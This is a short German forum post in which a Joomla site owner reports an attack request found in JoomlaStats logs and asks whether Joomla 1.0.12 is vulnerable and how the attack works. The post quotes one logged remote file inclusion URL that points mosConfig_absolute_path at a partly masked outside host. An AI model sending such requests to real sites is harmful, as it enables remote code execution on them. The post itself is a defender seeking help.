Hallo Leute,

ich habe in einer Joomla Installation in der nicht soo viele Seitenaufrufe sind, mal in JoomlaStats die Seitenaufrufe angesehen, weil ich nach was bestimmtem gesucht habe.

Und habe voll Entsetzen folgendes gesehen:

http://www.domain.de/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xboxchannel.narod****/main.txt?


Ich habe jetzt hier im Sicherheitsforum etwas nach gelesen bin mir aber über folgende Fragen nicht sicher.


1. Ist Joomla 1.0.12 gegen solche Attacken sicher?
Falls ja, welche früheren Versionen hätten mit der Attacke Probleme?

2. Wie funktioniert obige Attacke? Sind damit eventuelll 3th Party Komponenten unsicher? wie ich das sehe geht die Attacke ja direkt auf com_content, also Joomla Core. Oder?

Danke!